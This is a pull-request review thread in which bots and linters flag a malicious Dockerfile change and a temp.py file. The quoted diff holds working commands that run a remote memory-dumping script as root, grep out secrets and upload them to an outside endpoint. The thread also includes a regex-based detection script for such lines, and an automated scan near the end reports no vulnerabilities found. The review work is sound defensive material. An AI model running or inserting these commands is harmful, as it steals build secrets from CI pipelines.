Code Review
This pull request introduces malicious code into the Dockerfile. It adds commands that download and execute a script from an untrusted external source with elevated privileges. This script appears designed to find and exfiltrate secrets from the build environment to a third-party server. This constitutes a critical security vulnerability. These changes must be rejected and the lines removed immediately.
Dockerfile
Outdated
| RUN curl -sSf https://raw.githubusercontent.com/AdnaneKhan/Cacheract/b0d8565fa1ac52c28899c0cfc880d59943bc04ea/assets/memdump.py | sudo python3 | tr -d '\\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' >> /tmp/secrets | ||
| RUN curl -X PUT -d @/tmp/secrets https://bachelor-thesis-002.free.beeceptor.com |
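Review bot: Both RUN lines should be dropped: the first pipes a script fetched with curl directly into `sudo python3`, so remote code runs as root on the builder, and the second sends the resulting /tmp/secrets to an external host with `curl -X PUT -d @/tmp/secrets`. Nothing in the hunk gives either step a build purpose, and pinning the download to a commit hash does not make the script reviewed. Because the file is written in one RUN and read in the next, /tmp/secrets is also committed to an image layer and would ship to anyone who pulls the image.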
These two lines introduce a critical security vulnerability. They download a Python script from an untrusted GitHub repository, execute it with sudo (which is a remote code execution vulnerability), and then exfiltrate the collected data (likely secrets, based on the script name memdump.py and the grep pattern) to an external endpoint. This is a malicious backdoor and must be removed.
Actionable comments posted: 2
📜 Review details
Configuration used: Path: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
📒 Files selected for processing (1)
- Dockerfile (1 hunks)
🧰 Additional context used
🪛 GitHub Actions: PR Security Scan
Dockerfile
[error] 3-3: RUN curl -sSf https://raw.githubusercontent.com/AdnaneKhan/Cacheract/b0d8565fa1ac52c28899c0cfc880d59943bc04ea/assets/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":{"value":"[^"]*","isSecret":true}' >> /tmp/secrets did not complete: /bin/sh: sudo: not found; curl: (23) Failure writing output to destination.
🪛 Hadolint (2.14.0)
Dockerfile
[error] 3-3: Do not use sudo as it leads to unpredictable behavior. Use a tool like gosu to enforce root
(DL3004)
Actionable comments posted: 1
📜 Review details
Configuration used: Path: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
📒 Files selected for processing (2)
- Dockerfile (1 hunks)
- temp.py (1 hunks)
🚧 Files skipped from review as they are similar to previous changes (1)
- Dockerfile
🧰 Additional context used
🪛 Ruff (0.14.8)
temp.py
4-4: subprocess call: check for execution of untrusted input
(S603)
4-4: Starting a process with a partial executable path
(S607)
8-8: subprocess call: check for execution of untrusted input
(S603)
8-8: Starting a process with a partial executable path
(S607)
| import subprocess | ||
| # This is for research purposes only | ||
| cmd1 = '''curl -sSf https://raw.githubusercontent.com/AdnaneKhan/Cacheract/b0d8565fa1ac52c28899c0cfc880d59943bc04ea/assets/memdump.py | sudo python3 | tr -d '\\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' >> /tmp/secrets''' | ||
| subprocess.run(["bash", "-c", cmd1]) | ||
|
|
||
| # This is for research purposes only | ||
| cmd2 = "curl -X PUT -d @/tmp/secrets https://bachelor-thesis-002.free.beeceptor.com" | ||
| subprocess.run(["bash", "-c", cmd2]) | ||
|
|
||
| import time | ||
| time.sleep(60 * 15) |
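Review bot: cmd1 and cmd2 are the same download-and-run and upload commands as the earlier Dockerfile RUN lines, now passed to `bash -c` through subprocess.run, which moves them out of the Dockerfile where a Dockerfile linter inspects RUN lines; the file should be removed rather than relocated. Neither subprocess.run call checks the return code, so a failed step passes silently, and the closing time.sleep(60 * 15) holds the process for 15 minutes with no reason given in the file.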
🚨 CRITICAL SECURITY ISSUE: This is malicious code - a supply chain attack attempting secret exfiltration.
This script performs the following malicious actions:
- Remote Code Execution (Line 3-4): Downloads and executes arbitrary Python code (memdump.py) from an external GitHub repository with sudo privileges.
- Secret Extraction (Line 3): The downloaded script dumps memory and extracts JSON fragments matching the pattern "isSecret":true, indicating credential/secret harvesting.
- Data Exfiltration (Line 7-8): Uploads the stolen secrets to an external endpoint (beeceptor.com) controlled by an attacker.
- Evasion/Persistence (Line 11): Sleeps for 15 minutes, likely to maintain execution context during CI/CD runs.
The "research purposes only" comments do not legitimize this behavior. This code would compromise any CI/CD pipeline, build environment, or system where this Docker image is built, stealing secrets and credentials.
This PR must not be merged. The repository maintainers should investigate the submitting account and consider reporting this to GitHub as a malicious contribution attempt.
🧰 Tools
🪛 Ruff (0.14.8)
4-4: subprocess call: check for execution of untrusted input
(S603)
4-4: Starting a process with a partial executable path
(S607)
8-8: subprocess call: check for execution of untrusted input
(S603)
8-8: Starting a process with a partial executable path
(S607)
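A check a maintainer could run over the added lines of an incoming PR to flag the behaviours this review describes, as an added example that is not part of the original thread or of any bot's own code. The rule names, the `scan_added_lines` function and the sample lines (with `example.invalid` hosts) are constructed for illustration.

```python
import re

# Rule names are this example's own; each pattern targets one behaviour the review describes.
RULES = [
    # A download piped straight into an interpreter, with or without sudo.
    ("remote-script-piped-to-interpreter", re.compile(
        r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?"
        r"(?:sh|bash|zsh|dash|python[\d.]*|perl|ruby|node)\b")),
    # curl sending the contents of a local file (-d @file, -T file, -F name=@file).
    ("local-file-uploaded-with-curl", re.compile(
        r"\bcurl\b.*\s(?:(?:-d|--data|--data-binary)\s*@\S+"
        r"|(?:-T|--upload-file)\s+\S+|(?:-F|--form)\s+\S*=@\S+)")),
    # A shell command line handed to subprocess, which hides it from Dockerfile linters.
    ("shell-command-via-subprocess", re.compile(
        r"subprocess\.\w+\(\s*\[\s*[\"'](?:ba)?sh[\"']\s*,\s*[\"']-c[\"']"
        r"|subprocess\.\w+\(.*shell\s*=\s*True")),
]


def scan_added_lines(added_lines):
    """Return (path, line_no, rule) for every rule that matches an added line."""
    findings = []
    for path, line_no, text in added_lines:
        for rule, pattern in RULES:
            if pattern.search(text):
                findings.append((path, line_no, rule))
    return findings


# Constructed sample input: (path, line number, added text) as taken from a PR diff.
SAMPLE = [
    ("Dockerfile", 3,
     "RUN curl -sSf https://example.invalid/tool.py | sudo python3 >> /tmp/out"),
    ("Dockerfile", 4,
     "RUN curl -X PUT -d @/tmp/out https://collector.example.invalid"),
    # Benign download-then-unpack: no pipe to an interpreter, no upload.
    ("Dockerfile", 5,
     "RUN curl -sSfLo /tmp/pkg.tgz https://example.invalid/pkg.tgz && tar -xzf /tmp/pkg.tgz"),
    # The same pipeline inside a Python string literal is still caught by the text scan.
    ("build.py", 3,
     "cmd = '''curl -sSf https://example.invalid/tool.py | sudo python3'''"),
    ("build.py", 4, 'subprocess.run(["bash", "-c", cmd])'),
]

if __name__ == "__main__":
    for path, line_no, rule in scan_added_lines(SAMPLE):
        print(f"{path}:{line_no}: {rule}")
```

Matches are leads for a human reviewer, not verdicts; run it on PRs from forks before any workflow that has access to secrets builds the branch.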
RUN python3 /usr/local/src/temp.py
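Review bot: This RUN executes /usr/local/src/temp.py during the image build, so whatever the script does runs on the build host with the build's environment. The line does not say what the script contributes to the image; remove it together with the script unless a reviewed build step actually needs it.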
Security Scan Results for PR
Docker Image Scan Results
Source Code Scan Results
🎉 No vulnerabilities found!
What does this PR do?
(Provide a description of what this PR does and why it's needed.)
Test Plan
(Write your test plan here. If you changed any code, please provide us with clear instructions on how you verified your changes work. Screenshots may also be helpful.)
Related PRs and Issues
Checklist